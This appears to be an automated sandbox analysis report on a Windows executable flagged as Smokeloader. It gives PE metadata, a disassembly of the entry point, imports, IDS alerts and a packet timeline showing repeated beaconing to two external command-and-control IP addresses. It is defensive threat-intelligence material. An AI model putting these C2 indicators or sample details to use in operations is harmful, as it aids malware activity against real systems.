                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................q.......N.......O.......=.............X/K.......u.....X/p.....Rich............................PE..L......c...
                  Icon Hash:4111414d4545610d
                  Entrypoint:0x404457
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x63D9BDDC [Wed Feb 1 01:18:20 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fee2e01e9ecb27c28da2b6fc37f265e9
                  Instruction
                  call 00007F0AD0BAE002h
                  jmp 00007F0AD0BA8185h
                  push 00000014h
                  push 00417FD8h
                  call 00007F0AD0BAB3F8h
                  call 00007F0AD0BAE1D3h
                  movzx esi, ax
                  push 00000002h
                  call 00007F0AD0BADF95h
                  pop ecx
                  mov eax, 00005A4Dh
                  cmp word ptr [00400000h], ax
                  je 00007F0AD0BA8186h
                  xor ebx, ebx
                  jmp 00007F0AD0BA81B5h
                  mov eax, dword ptr [0040003Ch]
                  cmp dword ptr [eax+00400000h], 00004550h
                  jne 00007F0AD0BA816Dh
                  mov ecx, 0000010Bh
                  cmp word ptr [eax+00400018h], cx
                  jne 00007F0AD0BA815Fh
                  xor ebx, ebx
                  cmp dword ptr [eax+00400074h], 0Eh
                  jbe 00007F0AD0BA818Bh
                  cmp dword ptr [eax+004000E8h], ebx
                  setne bl
                  mov dword ptr [ebp-1Ch], ebx
                  call 00007F0AD0BAA5CFh
                  test eax, eax
                  jne 00007F0AD0BA818Ah
                  push 0000001Ch
                  call 00007F0AD0BA8261h
                  pop ecx
                  call 00007F0AD0BA9B82h
                  test eax, eax
                  jne 00007F0AD0BA818Ah
                  push 00000010h
                  call 00007F0AD0BA8250h
                  pop ecx
                  call 00007F0AD0BAE00Eh
                  and dword ptr [ebp-04h], 00000000h
                  call 00007F0AD0BAC3B1h
                  test eax, eax
                  jns 00007F0AD0BA818Ah
                  push 0000001Bh
                  call 00007F0AD0BA8236h
                  pop ecx
                  call dword ptr [004120B0h]
                  mov dword ptr [040221E4h], eax
                  call 00007F0AD0BAE029h
                  mov dword ptr [0043474Ch], eax
                  call 00007F0AD0BADBE6h
                  test eax, eax
                  jns 00007F0AD0BA818Ah
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x183e40x28.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c230000x167e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c3a0000x1380.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x121f00x38.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x178f80x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x120000x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x100350x102004f9e4c23291af98ce906d4794e50b6e5False0.6008660368217055data6.697335444882217IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x120000x6c720x6e00e2d73d3b44c95c749ad396d574d1f352False0.38966619318181817data4.7269437397183935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x190000x3c091e80x1b80017ef8710008af065e3a1993cc59a78a3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x3c230000x167e00x168006d5fccfdf3d87f80f094865b42c86796False0.4258572048611111data4.959479448152928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x3c3a0000x13800x14002f407534a4dc25a7b6ae3459d0b7246cFalse0.747265625data6.463258994354438IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  AFX_DIALOG_LAYOUT0x3c390200xedata1.5714285714285714
                  RT_ICON0x3c236e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.41647465437788017
                  RT_ICON0x3c23da80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.16410788381742739
                  RT_ICON0x3c263500x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.21365248226950354
                  RT_ICON0x3c267e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3664712153518124
                  RT_ICON0x3c276900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.45442238267148016
                  RT_ICON0x3c27f380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.45506912442396313
                  RT_ICON0x3c286000x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4638728323699422
                  RT_ICON0x3c28b680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2683609958506224
                  RT_ICON0x3c2b1100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.3072232645403377
                  RT_ICON0x3c2c1b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.35106382978723405
                  RT_ICON0x3c2c6880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5687633262260128
                  RT_ICON0x3c2d5300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5496389891696751
                  RT_ICON0x3c2ddd80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.619942196531792
                  RT_ICON0x3c2e3400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.46141078838174276
                  RT_ICON0x3c308e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.48850844277673544
                  RT_ICON0x3c319900x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.49221311475409835
                  RT_ICON0x3c323180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.449468085106383
                  RT_ICON0x3c327e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.4240405117270789
                  RT_ICON0x3c336900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4833032490974729
                  RT_ICON0x3c33f380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5835253456221198
                  RT_ICON0x3c346000x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4913294797687861
                  RT_ICON0x3c34b680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4701244813278008
                  RT_ICON0x3c371100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4878048780487805
                  RT_ICON0x3c381b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.5032786885245901
                  RT_ICON0x3c38b400x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5514184397163121
                  RT_STRING0x3c392700x2bcdata0.49142857142857144
                  RT_STRING0x3c395300x2acdata0.48830409356725146
                  RT_GROUP_ICON0x3c327800x68data0.7115384615384616
                  RT_GROUP_ICON0x3c2c6200x68data0.6826923076923077
                  RT_GROUP_ICON0x3c267b80x30data0.9375
                  RT_GROUP_ICON0x3c38fa80x76data0.6779661016949152
                  RT_VERSION0x3c390300x23cdata0.5367132867132867
                  DLLImport
                  KERNEL32.dllGlobalMemoryStatus, GetLocaleInfoA, LocalCompact, InterlockedDecrement, GetComputerNameW, CreateHardLinkA, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, GetUserDefaultLangID, SetCommState, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, SetCalendarInfoW, GetExitCodeThread, AddAtomW, CreateEventW, GlobalFindAtomW, GetOEMCP, LoadLibraryExA, VirtualProtect, GetConsoleProcessList, GetTempPathA, GetVolumeInformationW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, GetStringTypeW, LoadLibraryExW, OutputDebugStringW, LCMapStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, CreateFileW
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  04/26/24-11:50:57.657192TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975080192.168.2.5190.187.52.42
                  04/26/24-11:48:53.977641TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972780192.168.2.5119.204.11.2
                  04/26/24-11:49:35.592735TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973680192.168.2.5119.204.11.2
                  04/26/24-11:49:00.896944TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973080192.168.2.5119.204.11.2
                  04/26/24-11:50:23.070925TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974480192.168.2.5190.187.52.42
                  04/26/24-11:47:23.987965TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971380192.168.2.5119.204.11.2
                  04/26/24-11:47:22.464464TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971280192.168.2.5119.204.11.2
                  04/26/24-11:47:29.304265TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971680192.168.2.5119.204.11.2
                  04/26/24-11:50:39.540792TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974780192.168.2.5190.187.52.42
                  04/26/24-11:48:43.367329TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972280192.168.2.5119.204.11.2
                  04/26/24-11:49:47.864493TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973880192.168.2.5119.204.11.2
                  04/26/24-11:50:11.655696TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974280192.168.2.5190.187.52.42
                  04/26/24-11:47:27.784659TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971580192.168.2.5119.204.11.2
                  04/26/24-11:50:44.236303TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.5190.187.52.42
                  04/26/24-11:49:56.135562TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973980192.168.2.5190.187.52.42
                  04/26/24-11:48:46.715630TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972480192.168.2.5119.204.11.2
                  04/26/24-11:47:32.343784TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971880192.168.2.5119.204.11.2
                  04/26/24-11:50:28.180861TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974580192.168.2.5190.187.52.42
                  04/26/24-11:49:18.365467TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973380192.168.2.5119.204.11.2
                  04/26/24-11:47:25.556178TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971480192.168.2.5119.204.11.2
                  04/26/24-11:47:30.826079TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971780192.168.2.5119.204.11.2
                  04/26/24-11:47:20.949841TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971180192.168.2.5119.204.11.2
                  04/26/24-11:50:02.490715TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974080192.168.2.5190.187.52.42
                  04/26/24-11:50:32.759541TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974680192.168.2.5190.187.52.42
                  04/26/24-11:49:23.641505TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973480192.168.2.5119.204.11.2
                  04/26/24-11:48:57.550009TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972980192.168.2.5119.204.11.2
                  04/26/24-11:49:05.885669TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973180192.168.2.5119.204.11.2
                  04/26/24-11:48:50.067757TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972680192.168.2.5119.204.11.2
                  04/26/24-11:50:16.085964TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974380192.168.2.5190.187.52.42
                  04/26/24-11:49:30.712687TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973580192.168.2.5119.204.11.2
                  04/26/24-11:48:48.305830TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972580192.168.2.5119.204.11.2
                  04/26/24-11:48:55.896378TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972880192.168.2.5119.204.11.2
                  04/26/24-11:47:33.917741TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971980192.168.2.5119.204.11.2
                  04/26/24-11:49:12.723020TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973280192.168.2.5119.204.11.2
                  04/26/24-11:50:07.106115TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974180192.168.2.5190.187.52.42
                  04/26/24-11:48:44.986285TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972380192.168.2.5119.204.11.2
                  04/26/24-11:49:40.768533TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973780192.168.2.5119.204.11.2
                  04/26/24-11:47:35.150965TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972080192.168.2.5119.204.11.2
                  04/26/24-11:50:49.712608TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974980192.168.2.5190.187.52.42
                  TimestampSource PortDest PortSource IPDest IP
                  Apr 26, 2024 11:47:20.625984907 CEST4971180192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:20.949477911 CEST8049711119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:20.949599981 CEST4971180192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:20.949841022 CEST4971180192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:20.949866056 CEST4971180192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:21.272655010 CEST8049711119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:22.135804892 CEST8049711119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:22.135905981 CEST8049711119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:22.136003017 CEST4971180192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:22.136928082 CEST4971180192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:22.141020060 CEST4971280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:22.460297108 CEST8049711119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:22.464209080 CEST8049712119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:22.464299917 CEST4971280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:22.464463949 CEST4971280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:22.464495897 CEST4971280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:22.787415981 CEST8049712119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:23.658689976 CEST8049712119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:23.658716917 CEST8049712119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:23.658782959 CEST4971280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:23.658989906 CEST4971280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:23.662667036 CEST4971380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:23.982187986 CEST8049712119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:23.987692118 CEST8049713119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:23.987780094 CEST4971380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:23.987965107 CEST4971380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:23.987986088 CEST4971380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:24.314064026 CEST8049713119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:25.165426970 CEST8049713119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:25.165448904 CEST8049713119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:25.165627956 CEST4971380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:25.165817976 CEST4971380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:25.169648886 CEST4971480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:25.491386890 CEST8049713119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:25.494249105 CEST8049714119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:25.497134924 CEST4971480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:25.556178093 CEST4971480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:25.557106018 CEST4971480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:25.881680965 CEST8049714119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:26.740653992 CEST8049714119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:26.740689039 CEST8049714119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:26.740855932 CEST4971480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:26.893112898 CEST4971480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:27.218122005 CEST8049714119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:27.460973024 CEST4971580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:27.784348011 CEST8049715119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:27.784564018 CEST4971580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:27.784658909 CEST4971580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:27.784682989 CEST4971580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:28.108074903 CEST8049715119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:28.977370024 CEST8049715119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:28.977396011 CEST8049715119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:28.977511883 CEST4971580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:28.978363991 CEST4971580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:28.981178999 CEST4971680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:29.301593065 CEST8049715119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:29.304022074 CEST8049716119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:29.304102898 CEST4971680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:29.304265022 CEST4971680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:29.304290056 CEST4971680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:29.627291918 CEST8049716119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:30.499388933 CEST8049716119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:30.499414921 CEST8049716119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:30.499505043 CEST4971680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:30.499664068 CEST4971680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:30.502599001 CEST4971780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:30.822741032 CEST8049716119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:30.825825930 CEST8049717119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:30.826004982 CEST4971780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:30.826078892 CEST4971780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:30.826106071 CEST4971780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:31.154119968 CEST8049717119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:32.017399073 CEST8049717119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:32.017426014 CEST8049717119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:32.017530918 CEST4971780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:32.017754078 CEST4971780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:32.020759106 CEST4971880192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:32.341816902 CEST8049717119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:32.343493938 CEST8049718119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:32.343606949 CEST4971880192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:32.343784094 CEST4971880192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:32.343822002 CEST4971880192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:32.666712999 CEST8049718119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:33.586575985 CEST8049718119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:33.586605072 CEST8049718119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:33.586692095 CEST4971880192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:33.587172031 CEST4971880192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:33.595417023 CEST4971980192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:33.909780025 CEST8049718119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:33.917362928 CEST8049719119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:33.917530060 CEST4971980192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:33.917741060 CEST4971980192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:33.917766094 CEST4971980192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:34.241972923 CEST8049719119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:34.821923971 CEST8049719119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:34.821954012 CEST8049719119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:34.822174072 CEST4971980192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:34.822412968 CEST4971980192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:34.826395035 CEST4972080192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:35.144359112 CEST8049719119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:35.150650978 CEST8049720119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:35.150820017 CEST4972080192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:35.150964975 CEST4972080192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:35.151002884 CEST4972080192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:35.474416018 CEST8049720119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:36.358182907 CEST8049720119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:36.358212948 CEST8049720119.204.11.2192.168.2.5
                  Apr 26, 2024 11:47:36.358319044 CEST4972080192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:36.358530998 CEST4972080192.168.2.5119.204.11.2
                  Apr 26, 2024 11:47:36.682049036 CEST8049720119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:43.040369034 CEST4972280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:43.362478971 CEST8049722119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:43.367121935 CEST4972280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:43.367328882 CEST4972280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:43.367362976 CEST4972280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:43.688973904 CEST8049722119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:44.553025007 CEST8049722119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:44.553040981 CEST8049722119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:44.553095102 CEST4972280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:44.553783894 CEST4972280192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:44.659430027 CEST4972380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:44.876194954 CEST8049722119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:44.982142925 CEST8049723119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:44.985202074 CEST4972380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:44.986284971 CEST4972380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:44.986316919 CEST4972380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:45.309604883 CEST8049723119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:46.168170929 CEST8049723119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:46.168193102 CEST8049723119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:46.168271065 CEST4972380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:46.172502041 CEST4972380192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:46.390078068 CEST4972480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:46.495284081 CEST8049723119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:46.715344906 CEST8049724119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:46.715451002 CEST4972480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:46.715630054 CEST4972480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:46.715683937 CEST4972480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:47.067172050 CEST8049724119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:47.913717985 CEST8049724119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:47.913731098 CEST8049724119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:47.913938046 CEST4972480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:47.914045095 CEST4972480192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:47.983084917 CEST4972580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:48.241354942 CEST8049724119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:48.305588007 CEST8049725119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:48.305672884 CEST4972580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:48.305830002 CEST4972580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:48.305830956 CEST4972580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:48.628324986 CEST8049725119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:49.475702047 CEST8049725119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:49.475847960 CEST8049725119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:49.475948095 CEST4972580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:49.476047039 CEST4972580192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:49.716361046 CEST4972680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:49.798711061 CEST8049725119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:50.067487955 CEST8049726119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:50.067576885 CEST4972680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:50.067756891 CEST4972680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:50.067790985 CEST4972680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:50.393011093 CEST8049726119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:51.259509087 CEST8049726119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:51.259526968 CEST8049726119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:51.259641886 CEST4972680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:51.259820938 CEST4972680192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:51.585020065 CEST8049726119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:53.649585962 CEST4972780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:53.977329969 CEST8049727119.204.11.2192.168.2.5
                  Apr 26, 2024 11:48:53.977485895 CEST4972780192.168.2.5119.204.11.2
                  Apr 26, 2024 11:48:53.977641106 CEST4972780192.168.2.5119.204.11.2
